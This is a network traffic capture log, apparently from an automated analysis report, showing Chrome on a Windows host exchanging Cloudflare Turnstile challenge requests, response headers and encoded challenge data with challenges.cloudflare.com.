Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:21 UTC	916	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 29700 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: a7423da5d113469 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:21 UTC	16384	OUT	Data Raw: 76 5f 38 37 39 36 36 39 38 38 30 66 65 61 30 61 63 64 3d 32 31 71 4f 33 49 55 63 48 34 4a 61 71 49 2d 31 59 79 64 76 6f 65 52 34 31 66 6c 31 49 6c 55 53 36 30 34 52 49 76 31 55 32 30 37 70 30 55 48 6b 2d 30 4e 30 4d 65 59 76 77 30 54 64 30 74 69 4f 59 46 73 71 65 4f 4f 55 41 7a 30 49 71 2d 71 6c 66 66 34 52 55 6d 30 59 71 55 64 30 36 4d 38 71 57 30 61 52 30 41 55 57 30 54 33 34 6d 74 6e 4f 4a 55 67 30 66 31 55 36 30 39 4a 55 61 34 34 30 30 76 6f 30 32 48 4f 30 32 33 4c 66 55 45 30 55 63 30 49 77 66 30 72 4e 4c 6b 59 49 79 30 46 62 49 30 66 41 49 52 68 34 68 30 49 6b 70 65 47 77 49 30 48 37 31 41 34 45 79 47 4d 52 30 32 71 65 30 36 4c 74 2d 4a 71 48 79 30 76 69 24 58 59 59 77 59 37 39 45 49 77 33 34 34 54 66 38 6e 58 79 6e 63 47 7a 70 43 66 6a 6e 55 44 44 Data Ascii: v_879669880fea0acd=21qO3IUcH4JaqI-1YydvoeR41fl1IlUS604RIv1U207p0UHk-0N0MeYvw0Td0tiOYFsqeOOUAz0Iq-qlff4RUm0YqUd06M8qW0aR0AUW0T34mtnOJUg0f1U609JUa4400vo02HO023LfUE0Uc0Iwf0rNLkYIy0FbI0fAIRh4h0IkpeGwI0H71A4EyGMR02qe06Lt-JqHy0vi$XYYwY79EIw344Tf8nXyncGzpCfjnUDD
2024-04-24 13:24:21 UTC	13316	OUT	Data Raw: 74 4a 64 2b 4c 39 49 65 55 44 6c 49 68 59 30 32 43 56 47 2b 50 70 57 30 54 30 6b 30 55 65 55 32 30 74 30 59 4b 30 37 65 6e 71 59 63 65 31 30 55 52 55 31 55 69 65 32 4f 4c 48 30 59 30 6d 4f 36 4a 30 6a 30 37 4f 49 76 65 6b 30 63 65 49 6c 30 6d 30 61 65 30 4a 55 4c 30 62 65 30 4b 30 48 30 46 76 30 76 30 33 30 66 52 64 76 55 4d 30 50 52 66 63 55 6c 30 52 65 4c 2b 56 32 30 50 30 66 30 49 4b 30 64 30 30 37 4f 4e 30 71 48 59 63 6b 5a 4f 49 61 59 65 30 46 4f 74 4f 4c 4f 49 70 30 55 30 71 31 30 53 65 34 55 57 74 55 49 30 4c 4f 55 72 55 72 4f 32 4f 30 63 55 5a 4f 71 48 55 31 55 4b 52 36 66 4c 49 30 36 48 76 65 66 6c 55 38 30 64 30 36 6c 55 5a 30 46 65 66 4b 55 61 30 43 65 49 39 70 49 30 4b 52 49 4f 55 45 30 66 30 59 79 55 42 30 46 49 55 30 55 6f 30 76 30 59 57 30 Data Ascii: tJd+L9IeUDlIhY02CVG+PpW0T0k0UeU20t0YK07enqYce10URU1Uie2OLH0Y0mO6J0j07OIvek0ceIl0m0ae0JUL0be0K0H0Fv0v030fRdvUM0PRfcUl0ReL+V20P0f0IK0d007ON0qHYckZOIaYe0FOtOLOIp0U0q10Se4UWtUI0LOUrUrO2O0cUZOqHU1UKR6fLI06HveflU80d06lUZ0FefKUa0CeI9pI0KRIOUE0f0YyUB0FIU0Uo0v0YW0
2024-04-24 13:24:22 UTC	350	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:21 GMT Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-chl-gen: FcT+BSZBPXMcxA27pzbjkDkUuX80ZX7EDSzXlNdwZfjPw76ojvDqIixy3BzjTX9z$FNhpGazbCjjPmcJ8FlhnaA== vary: accept-encoding Server: cloudflare CF-RAY: 879669c42a2609ff-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:22 UTC	275	IN	Data Raw: 31 30 63 0d 0a 6a 6e 65 35 6a 5a 53 59 72 5a 46 37 77 37 68 2b 68 59 71 31 78 73 79 74 6e 71 66 4e 6b 4c 79 72 30 5a 57 79 6f 4e 71 59 6a 64 62 56 70 38 6e 62 34 4d 44 6b 73 4f 44 66 70 4a 37 69 75 4f 48 4c 76 75 6a 4d 36 61 7a 73 36 4e 4c 77 72 36 37 58 79 72 6e 59 39 72 57 2b 37 37 4b 35 36 2f 72 39 30 67 66 34 31 66 50 63 43 4d 67 47 34 67 48 64 45 50 73 49 79 67 37 2b 42 76 66 72 42 66 67 59 47 64 34 55 46 79 48 66 49 4f 41 4f 46 68 49 70 4b 51 6b 6b 35 79 73 58 49 50 44 2b 4e 41 73 43 49 7a 41 31 42 54 67 51 39 44 63 39 4b 54 45 4f 51 43 77 34 2b 6a 34 76 4f 53 70 48 52 45 67 44 52 6a 67 4e 52 30 34 37 54 42 46 53 49 45 49 51 57 54 6c 56 50 56 74 48 55 42 30 74 55 44 78 41 4d 6c 68 58 49 31 74 6f 62 53 31 4f 4b 30 38 6e 52 6a 34 77 51 46 39 31 56 48 Data Ascii: 10cjne5jZSYrZF7w7h+hYq1xsytnqfNkLyr0ZWyoNqYjdbVp8nb4MDksODfpJ7iuOHLvujM6azs6NLwr67XyrnY9rW+77K56/r90gf41fPcCMgG4gHdEPsIyg7+BvfrBfgYGd4UFyHfIOAOFhIpKQkk5ysXIPD+NAsCIzA1BTgQ9Dc9KTEOQCw4+j4vOSpHREgDRjgNR047TBFSIEIQWTlVPVtHUB0tUDxAMlhXI1tobS1OK08nRj4wQF91VH
2024-04-24 13:24:22 UTC	1369	IN	Data Raw: 63 39 37 0d 0a 52 33 4a 42 58 31 4f 4a 64 34 36 47 53 57 68 6d 54 35 57 47 68 33 65 47 63 32 74 6d 6c 6e 65 64 6c 32 42 34 64 6e 56 32 63 71 4b 61 70 5a 53 59 66 32 4f 48 64 6d 75 4a 71 34 32 73 63 4c 4a 7a 70 36 46 34 71 4c 53 64 75 48 32 79 6f 4a 4f 30 73 71 57 59 66 62 36 78 75 4b 62 43 74 62 6d 71 78 72 6d 2b 72 73 71 39 79 4c 4c 4f 77 63 6d 32 30 73 57 39 75 74 62 4a 77 72 37 61 7a 63 50 47 6e 39 50 67 78 2b 75 69 75 74 6e 6f 32 63 4f 72 73 36 62 75 72 73 71 75 36 37 58 6a 37 65 2b 33 36 65 79 34 2f 64 69 37 32 76 41 48 33 50 76 34 78 51 66 61 34 4d 58 4c 35 74 72 74 33 4d 30 56 7a 67 6e 74 35 77 54 32 42 68 6e 64 2f 67 44 67 38 69 55 6e 47 2b 50 36 43 42 34 74 4a 4f 59 6d 47 43 6f 6d 49 77 30 30 42 41 4d 6e 42 52 55 4b 42 53 63 71 44 67 6b 41 46 68 Data Ascii: c97R3JBX1OJd46GSWhmT5WGh3eGc2tmlnedl2B4dnV2cqKapZSYf2OHdmuJq42scLJzp6F4qLSduH2yoJO0sqWYfb6xuKbCtbmqxrm+rsq9yLLOwcm20sW9utbJwr7azcPGn9Pgx+uiutno2cOrs6bursqu67Xj7e+36ey4/di72vAH3Pv4xQfa4MXL5trt3M0Vzgnt5wT2Bhnd/gDg8iUnG+P6CB4tJOYmGComIw00BAMnBRUKBScqDgkAFh
2024-04-24 13:24:22 UTC	1369	IN	Data Raw: 51 6f 78 35 57 6e 64 6b 51 6b 36 51 6a 49 68 54 6a 6c 39 74 67 32 39 6b 61 33 78 33 69 58 31 64 6e 57 47 59 6d 32 42 6b 6c 46 75 72 66 61 52 6a 70 34 4b 6b 71 61 71 47 6b 36 47 7a 6f 59 5a 31 73 72 71 6d 64 37 32 64 77 4c 6d 2b 72 48 32 2b 77 34 57 44 6c 4b 69 47 79 71 61 6e 6a 4c 69 64 70 36 6e 50 79 71 2b 57 73 5a 53 75 6a 64 76 63 79 4e 37 66 7a 36 2f 53 77 4c 4f 2f 70 2b 6a 45 6f 64 58 74 79 71 6e 47 79 65 57 39 38 75 65 75 7a 66 44 33 2b 76 54 6a 2f 4c 58 38 31 76 6d 34 41 4e 2f 4d 41 51 44 6d 33 51 6a 6e 2b 65 33 74 41 67 48 4b 42 67 33 4e 35 4f 44 7a 36 66 6e 76 2b 42 55 46 45 76 58 31 45 79 44 32 32 52 50 6c 41 50 49 55 38 67 45 49 39 43 2f 35 4a 67 66 74 37 78 41 50 4e 44 48 31 43 78 44 77 45 51 58 31 4c 2f 77 4b 4d 42 77 34 48 7a 6b 33 42 41 55 Data Ascii: Qox5WndkQk6QjIhTjl9tg29ka3x3iX1dnWGYm2BklFurfaRjp4KkqaqGk6GzoYZ1srqmd72dwLm+rH2+w4WDlKiGyqanjLidp6nPyq+WsZSujdvcyN7fz6/SwLO/p+jEodXtyqnGyeW98ueuzfD3+vTj/LX81vm4AN/MAQDm3Qjn+e3tAgHKBg3N5ODz6fnv+BUFEvX1EyD22RPlAPIU8gEI9C/5Jgft7xAPNDH1CxDwEQX1L/wKMBw4Hzk3BAU
2024-04-24 13:24:22 UTC	492	IN	Data Raw: 45 32 47 6a 49 46 56 66 35 42 35 57 5a 4b 48 57 35 32 63 57 33 69 56 6f 5a 36 57 58 70 32 6f 71 57 47 42 64 33 32 57 69 34 6c 6d 72 5a 36 77 71 48 57 49 6c 4b 61 76 6a 34 31 75 76 49 65 74 77 62 4f 63 6f 72 44 44 6e 37 50 48 6c 71 43 45 6e 61 47 66 79 37 79 63 71 38 6e 53 73 34 37 59 74 36 62 44 6d 4d 79 5a 31 74 6d 76 72 74 2f 63 6e 64 76 69 78 39 57 79 30 39 33 48 35 65 79 6d 70 36 6a 44 33 74 37 78 39 64 57 78 72 2f 66 30 38 50 58 32 2b 4c 4c 35 7a 77 58 4f 35 73 44 62 2f 4f 66 38 32 2b 33 68 79 4e 38 43 36 73 6f 4e 43 76 4d 59 46 4f 50 30 47 52 6a 33 39 39 6e 74 32 39 66 69 39 64 33 77 41 68 30 65 4a 41 45 71 41 43 37 32 34 53 2f 2b 2b 67 38 55 4e 50 34 32 45 43 34 44 37 52 63 4d 2b 6a 30 31 44 43 4d 6b 2b 7a 5a 46 51 6a 4d 66 50 41 4e 4f 47 79 67 61 Data Ascii: E2GjIFVf5B5WZKHW52cW3iVoZ6WXp2oqWGBd32Wi4lmrZ6wqHWIlKavj41uvIetwbOcorDDn7PHlqCEnaGfy7ycq8nSs47Yt6bDmMyZ1tmvrt/cndvix9Wy093H5eymp6jD3t7x9dWxr/f08PX2+LL5zwXO5sDb/Of82+3hyN8C6soNCvMYFOP0GRj399nt29fi9d3wAh0eJAEqAC724S/++g8UNP42EC4D7RcM+j01DCMk+zZFQjMfPANOGyga
2024-04-24 13:24:22 UTC	515	IN	Data Raw: 31 66 63 0d 0a 37 79 72 72 45 33 4f 53 2b 78 65 6a 6f 78 73 77 4c 2f 4d 6f 4d 33 2b 55 4c 41 74 48 33 47 65 72 76 46 42 6f 56 42 68 54 70 46 42 48 76 37 4f 4d 50 46 77 66 77 43 77 55 49 43 67 4d 5a 44 65 6a 74 48 52 50 72 4e 7a 4d 4b 45 43 73 47 4b 6a 6f 4f 46 43 6b 56 4c 78 4d 79 2f 51 4c 39 52 7a 68 4a 48 42 6b 37 41 46 42 44 41 78 77 79 4b 43 6b 7a 54 31 5a 53 45 43 68 5a 54 45 67 58 58 7a 39 56 49 6c 4a 45 5a 6a 5a 6c 58 53 59 30 4b 53 64 6a 52 47 41 37 51 6c 39 6e 4c 6d 4a 54 64 32 49 35 56 58 74 33 65 58 70 55 55 31 52 51 67 48 70 43 5a 6d 64 32 51 6a 31 57 57 6e 5a 6e 54 47 35 62 62 6c 36 49 6c 57 52 6c 62 47 32 50 6c 58 6c 72 57 48 4b 4b 6f 56 74 67 65 61 4f 54 6f 35 4f 44 59 6e 75 63 6d 6f 4f 77 6b 5a 71 6d 71 35 57 65 71 4b 36 68 68 49 71 74 6a Data Ascii: 1fc7yrrE3OS+xejoxswL/MoM3+ULAtH3GervFBoVBhTpFBHv7OMPFwfwCwUICgMZDejtHRPrNzMKECsGKjoOFCkVLxMy/QL9RzhJHBk7AFBDAxwyKCkzT1ZSEChZTEgXXz9VIlJEZjZlXSY0KSdjRGA7Ql9nLmJTd2I5VXt3eXpUU1RQgHpCZmd2Qj1WWnZnTG5bbl6IlWRlbG2PlXlrWHKKoVtgeaOTo5ODYnucmoOwkZqmq5WeqK6hhIqtj
2024-04-24 13:24:22 UTC	428	IN	Data Raw: 31 61 35 0d 0a 55 55 58 4a 50 57 46 46 34 64 57 4a 53 65 48 56 37 57 46 5a 35 66 6c 35 63 58 32 68 65 68 49 46 4b 69 6f 56 37 62 48 32 5a 63 33 64 31 6d 49 74 37 6c 6f 4b 59 6f 35 4f 6f 6e 5a 6d 62 61 49 78 6e 73 4b 47 79 68 6f 53 31 6b 34 61 55 6a 37 75 5a 64 70 4b 2f 75 62 2b 57 66 4a 79 75 74 72 53 43 77 71 71 67 6d 4d 53 4c 6a 5a 2b 35 6e 71 61 69 30 4c 36 78 78 4b 65 61 6b 63 79 62 30 73 75 7a 7a 72 61 34 6e 74 37 65 75 72 36 6e 77 74 69 31 31 75 2f 6b 36 74 33 52 37 4e 50 4b 34 38 36 33 35 75 2f 44 39 39 65 32 39 2b 34 42 2f 62 72 33 39 63 4c 36 39 75 4c 39 43 41 44 39 79 75 6a 2b 36 67 62 64 43 41 62 53 36 41 66 79 44 64 63 47 2b 76 37 71 43 2f 67 55 32 75 51 6e 34 2f 4c 32 39 43 59 70 44 42 30 65 42 65 6f 72 44 67 76 75 43 51 6f 50 38 67 7a 34 45 Data Ascii: 1a5UUXJPWFF4dWJSeHV7WFZ5fl5cX2hehIFKioV7bH2Zc3d1mIt7loKYo5OonZmbaIxnsKGyhoS1k4aUj7uZdpK/ub+WfJyutrSCwqqgmMSLjZ+5nqai0L6xxKeakcyb0suzzra4nt7eur6nwti11u/k6t3R7NPK48635u/D99e29+4B/br39cL69uL9CAD9yuj+6gbdCAbS6AfyDdcG+v7qC/gU2uQn4/L29CYpDB0eBeorDgvuCQoP8gz4E
2024-04-24 13:24:22 UTC	345	IN	Data Raw: 31 35 32 0d 0a 6e 71 75 4f 66 4d 4b 56 6e 37 2b 68 76 4a 75 78 6f 5a 75 72 79 4b 66 42 76 61 75 72 75 36 2f 50 73 4d 79 72 77 62 61 53 73 35 7a 4c 74 39 57 63 6d 4d 50 53 73 4d 37 52 31 39 79 6f 31 64 54 63 35 2b 36 68 75 75 7a 63 76 4b 2f 56 38 4d 62 58 71 38 2f 57 2b 39 7a 6d 79 65 6e 4b 77 73 48 53 76 50 61 39 41 74 71 38 2b 77 44 56 78 2b 58 68 2f 76 7a 76 39 65 33 77 39 51 63 4b 43 65 34 56 2b 52 37 66 37 77 6f 66 41 76 62 31 41 4e 6e 77 43 50 49 6f 35 41 55 74 37 50 67 79 37 7a 41 70 43 79 6a 75 47 6a 41 31 4c 79 73 30 46 42 4c 79 51 51 77 7a 45 45 41 56 46 7a 56 47 52 68 77 46 4f 45 38 4d 41 79 68 43 52 6b 41 72 46 6b 64 52 45 78 45 36 55 44 68 57 45 68 6b 64 4f 46 78 5a 59 56 6c 64 59 69 4e 6f 52 6c 68 69 58 30 6c 77 54 7a 38 38 63 30 6b 74 64 7a Data Ascii: 152nquOfMKVn7+hvJuxoZuryKfBvauru6/PsMyrwbaSs5zLt9WcmMPSsM7R19yo1dTc5+6huuzcvK/V8MbXq8/W+9zmyenKwsHSvPa9Atq8+wDVx+Xh/vzv9e3w9QcKCe4V+R7f7wofAvb1ANnwCPIo5AUt7Pgy7zApCyjuGjA1Lys0FBLyQQwzEEAVFzVGRhwFOE8MAyhCRkArFkdRExE6UDhWEhkdOFxZYVldYiNoRlhiX0lwTz88c0ktdz
2024-04-24 13:24:22 UTC	600	IN	Data Raw: 32 35 31 0d 0a 36 59 75 4a 71 31 6c 4b 71 61 6c 4b 54 42 6f 4b 65 55 71 71 43 70 68 4b 75 57 69 5a 75 4d 6b 71 71 2b 68 38 54 57 78 70 61 61 30 5a 79 75 72 5a 65 62 6d 4c 33 4f 6f 65 50 6e 70 2b 6a 6c 36 36 76 73 35 65 2b 76 70 37 76 7a 73 2f 57 30 31 63 76 44 30 63 7a 49 2f 66 75 31 79 51 44 72 77 41 50 69 42 38 34 45 38 63 62 45 42 4f 44 6c 37 65 4c 50 37 68 41 4d 35 77 6f 50 46 67 50 33 7a 42 6b 46 44 74 72 64 2b 66 48 32 4a 51 30 5a 42 66 49 47 41 77 6a 39 4b 79 41 68 42 41 6b 49 41 53 66 38 49 69 37 31 43 42 67 4f 37 54 63 6e 48 44 41 68 2b 68 6f 6c 49 69 63 30 41 7a 6c 47 49 6a 77 70 49 45 34 51 48 7a 4a 45 49 6a 30 6d 4a 6c 6b 32 52 43 6b 37 4e 55 73 2b 55 68 6b 37 4d 6b 42 46 59 42 35 68 4d 6b 74 71 56 45 56 50 50 56 34 2f 4c 57 63 30 62 53 39 43 Data Ascii: 2516YuJq1lKqalKTBoKeUqqCphKuWiZuMkqq+h8TWxpaa0ZyurZebmL3OoePnp+jl66vs5e+vp7vzs/W01cvD0czI/fu1yQDrwAPiB84E8cbEBODl7eLP7hAM5woPFgP3zBkFDtrd+fH2JQ0ZBfIGAwj9KyAhBAkIASf8Ii71CBgO7TcnHDAh+holIic0AzlGIjwpIE4QHzJEIj0mJlk2RCk7NUs+Uhk7MkBFYB5hMktqVEVPPV4/LWc0bS9C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49761	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:21 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/b/i/879669880fea0acd/1713965058385/hyoDSXK0siA_93U HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:22 UTC	200	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:22 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 879669c58ed20add-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:22 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 06 08 02 00 00 00 f2 a3 71 97 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR;qIDAT$IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49764	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:22 UTC	486	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:22 UTC	377	IN	HTTP/1.1 400 Bad Request Date: Wed, 24 Apr 2024 13:24:22 GMT Content-Type: application/json Content-Length: 7 Connection: close cf-chl-out: o0e/WjNQiSq4g0dv0ve80Q==$oQIPggTY9oqdSjDP/Wwlig== cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 879669ca1ac30a01-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:22 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49768	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:39 UTC	916	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 32753 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: a7423da5d113469 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:39 UTC	16384	OUT	Data Raw: 76 5f 38 37 39 36 36 39 38 38 30 66 65 61 30 61 63 64 3d 32 31 71 4f 33 49 55 63 48 34 4a 61 71 49 2d 31 59 79 64 76 6f 65 52 34 31 66 6c 31 49 6c 55 53 36 30 34 52 49 76 31 55 32 30 37 70 30 55 48 6b 2d 30 4e 30 4d 65 59 76 77 30 54 64 30 74 69 4f 59 46 73 71 65 4f 4f 55 41 7a 30 49 71 2d 71 6c 66 66 34 52 55 6d 30 59 71 55 64 30 36 4d 38 71 57 30 61 52 30 41 55 57 30 54 33 34 6d 74 6e 4f 4a 55 67 30 66 31 55 36 30 39 4a 55 61 34 34 30 30 76 6f 30 32 48 4f 30 32 33 4c 66 55 45 30 55 63 30 49 77 66 30 72 4e 4c 6b 59 49 79 30 46 62 49 30 66 41 49 52 68 34 68 30 49 6b 70 65 47 77 49 30 48 37 31 41 34 45 79 47 4d 52 30 32 71 65 30 36 4c 74 2d 4a 71 48 79 30 76 69 24 58 59 59 77 59 37 39 45 49 77 33 34 34 54 66 38 6e 58 79 6e 63 47 7a 70 43 66 6a 6e 55 44 44 Data Ascii: v_879669880fea0acd=21qO3IUcH4JaqI-1YydvoeR41fl1IlUS604RIv1U207p0UHk-0N0MeYvw0Td0tiOYFsqeOOUAz0Iq-qlff4RUm0YqUd06M8qW0aR0AUW0T34mtnOJUg0f1U609JUa4400vo02HO023LfUE0Uc0Iwf0rNLkYIy0FbI0fAIRh4h0IkpeGwI0H71A4EyGMR02qe06Lt-JqHy0vi$XYYwY79EIw344Tf8nXyncGzpCfjnUDD
2024-04-24 13:24:39 UTC	16369	OUT	Data Raw: 74 4a 64 2b 4c 39 49 65 55 44 6c 49 68 59 30 32 43 56 47 2b 50 70 57 30 54 30 6b 30 55 65 55 32 30 74 30 59 4b 30 37 65 6e 71 59 63 65 31 30 55 52 55 31 55 69 65 32 4f 4c 48 30 59 30 6d 4f 36 4a 30 6a 30 37 4f 49 76 65 6b 30 63 65 49 6c 30 6d 30 61 65 30 4a 55 4c 30 62 65 30 4b 30 48 30 46 76 30 76 30 33 30 66 52 64 76 55 4d 30 50 52 66 63 55 6c 30 52 65 4c 2b 56 32 30 50 30 66 30 49 4b 30 64 30 30 37 4f 4e 30 71 48 59 63 6b 5a 4f 49 61 59 65 30 46 4f 74 4f 4c 4f 49 70 30 55 30 71 31 30 53 65 34 55 57 74 55 49 30 4c 4f 55 72 55 72 4f 32 4f 30 63 55 5a 4f 71 48 55 31 55 4b 52 36 66 4c 49 30 36 48 76 65 66 6c 55 38 30 64 30 36 6c 55 5a 30 46 65 66 4b 55 61 30 43 65 49 39 70 49 30 4b 52 49 4f 55 45 30 66 30 59 79 55 42 30 46 49 55 30 55 6f 30 76 30 59 57 30 Data Ascii: tJd+L9IeUDlIhY02CVG+PpW0T0k0UeU20t0YK07enqYce10URU1Uie2OLH0Y0mO6J0j07OIvek0ceIl0m0ae0JUL0be0K0H0Fv0v030fRdvUM0PRfcUl0ReL+V20P0f0IK0d007ON0qHYckZOIaYe0FOtOLOIp0U0q10Se4UWtUI0LOUrUrO2O0cUZOqHU1UKR6fLI06HveflU80d06lUZ0FefKUa0CeI9pI0KRIOUE0f0YyUB0FIU0Uo0v0YW0
2024-04-24 13:24:39 UTC	1182	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-chl-out: dbMMB7gQ3awCBkkXPFR19FYxzi09sWUfkfcokhqr5ZY+XN6cINPPLLysGVlLvfYuwtmwuQ0p+8usHhocZI0h8cu8pfQOljc4g0c/MW67nGUaoS7fIS5L128+IBN+NaXj$RrwALJ0q5V4tXzh3Zu+oWw== cf-chl-out-s: oCX5y2z5AZ+rNqNSKkqAUp5gLhAILixZJjTfIkW1Ot0ek/Nyq6TsM4w8qyLntBm0CvpW75ZQaTck3/C3hVcHgZgtzKWBMeowCbClmPpFaRLf7BulfCM+bAGt2ZVfMcF0xtkYBqX9g0zLor8rTCqtZEPCPiQDH9jupk1L72arac3G178vAFZpfyBoYGrxyP6n4+FVOUsC0RR6vMnwTDegPdl18ssqi+ASTzDtONGBgJmksM2TFtd2GHtDv5y6dXud1F8ViXVAeXkfcAcTB0Ppl0FJtSD2TKf/5FQWFQHeBkCOofiw7oQhxf+2hm6iHHdOIw9zhfJTMXoLkD6o9N4nzHhQpzogmNrUAxtVZtw1czK1OIkp+4uyIvHYwlBFGQGRB49nXNsI9YlCZUe/9P4JD0fsf0S8ULbFTj01f2ZNnKm/Hh/GZSbunhBK/DL0V5aXfGY8AKoysX0esLKCoi84yu/srEmF9FjOYYQBQBpYiWbQhFS6wmiHMsWxeTIZC6tzE+i2bGx4WtVaOZp63KzB9KlsnpCiHnXl4Fi4ACNpoPHf6aIxdiqf666rcg104oRkhCuwIBSjEY0b3xGce9Soi02DBDQTvox3pYeBujXY/6zjRTdBNE2nVhrpYlkcEXgwWRgqydXnLWLbcHvcgs5JjzcHCWosV2PPC4Dwvj/c24twOnvjtTU/RBNtfhUu1073X6f+IeipVTBvaLn7ORZKXg==$K52gCWVf1usZuzh+SU4TJw== vary: accept-encoding Server: cloudflare CF-RAY: 87966a306a7c69e6-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:39 UTC	187	IN	Data Raw: 35 31 62 0d 0a 6a 6e 65 35 6a 5a 53 59 72 5a 46 37 77 37 68 2b 68 59 71 31 78 73 79 73 7a 38 72 4f 75 73 75 51 30 73 37 46 74 36 7a 45 75 4e 57 59 32 4e 53 2b 33 4a 75 61 77 37 62 67 78 4f 66 71 71 4f 65 6c 37 71 7a 73 76 4f 2f 47 70 61 72 75 79 4f 58 58 79 72 6e 59 39 2f 66 33 32 74 4b 34 2b 2b 48 41 35 67 62 78 2f 67 6e 6f 79 41 49 4e 39 77 44 4b 44 76 6f 46 43 42 4c 66 41 68 41 5a 2b 42 67 54 47 39 33 31 33 42 38 53 44 69 55 6c 42 53 67 69 4a 2b 63 67 4a 53 72 73 49 68 41 47 38 52 45 7a 4c 76 51 73 4c 7a 6f 50 47 77 59 36 4b 50 45 34 4f 67 77 75 2b 30 Data Ascii: 51bjne5jZSYrZF7w7h+hYq1xsysz8rOusuQ0s7Ft6zEuNWY2NS+3Juaw7bgxOfqqOel7qzsvO/GparuyOXXyrnY9/f32tK4++HA5gbx/gnoyAIN9wDKDvoFCBLfAhAZ+BgTG9313B8SDiUlBSgiJ+cgJSrsIhAG8REzLvQsLzoPGwY6KPE4Ogwu+0
